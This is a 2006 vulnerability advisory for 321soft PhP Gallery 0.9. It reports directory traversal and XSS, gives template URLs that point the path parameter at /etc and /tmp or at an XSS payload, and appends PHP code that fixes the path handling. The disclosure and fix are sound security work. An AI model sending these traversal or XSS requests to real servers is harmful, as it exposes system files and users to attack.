321soft PhP Gallery 0.9 - directory travel & XSS
May 02 2006 11:41PM
d4igoro gmail com
321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risk: Middle
credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp
http://[target]/index.php?path=[XSS]
solution:
----------------------------
index.php
fix $path
notes:
----------------------------
The vendor has been informed.
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html
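An added example, not part of the original post and not 321soft's code: one way to "fix $path" in index.php, assuming the script lists the directory named by the `path` parameter and echoes that value into the page. `GALLERY_ROOT` and `resolve_gallery_path()` are hypothetical names, since the advisory does not show the vendor's source.

```php
<?php
declare(strict_types=1);

// Assumption: all galleries live under one directory next to index.php.
const GALLERY_ROOT = __DIR__ . '/images';

/**
 * Resolve a user-supplied path to an existing directory inside $root.
 * Returns the canonical path, or null if it escapes $root or does not exist.
 */
function resolve_gallery_path(string $root, string $userPath): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    // Always treat the parameter as relative to the root, so "/etc" means
    // "<root>/etc" and never the filesystem's /etc.
    $joined = $rootReal . DIRECTORY_SEPARATOR . ltrim($userPath, "/\\");
    // realpath() collapses "../" and follows symlinks before the check below.
    $candidate = realpath($joined);
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Compare with a trailing separator so "<root>-private" cannot pass
    // as a child of "<root>".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$requested = (isset($_GET['path']) && is_string($_GET['path'])) ? $_GET['path'] : '';
$dir = resolve_gallery_path(GALLERY_ROOT, $requested);
if ($dir === null) {
    http_response_code(404);
    exit('Gallery not found'); // the rejected value is not echoed back
}

// Encode on output: both the parameter and file names are untrusted in HTML.
$flags = ENT_QUOTES | ENT_SUBSTITUTE;
echo '<h1>Gallery: ' . htmlspecialchars($requested, $flags, 'UTF-8') . "</h1>\n<ul>\n";
foreach (scandir($dir) ?: [] as $entry) {
    if ($entry[0] === '.') {
        continue; // skip ".", ".." and dotfiles
    }
    echo '<li>' . htmlspecialchars($entry, $flags, 'UTF-8') . "</li>\n";
}
echo "</ul>\n";
```

With this check, the `path=/etc` and `path=/tmp` requests from the advisory resolve under the gallery root and return 404 unless such a gallery directory exists, and any markup in `path` is rendered as text.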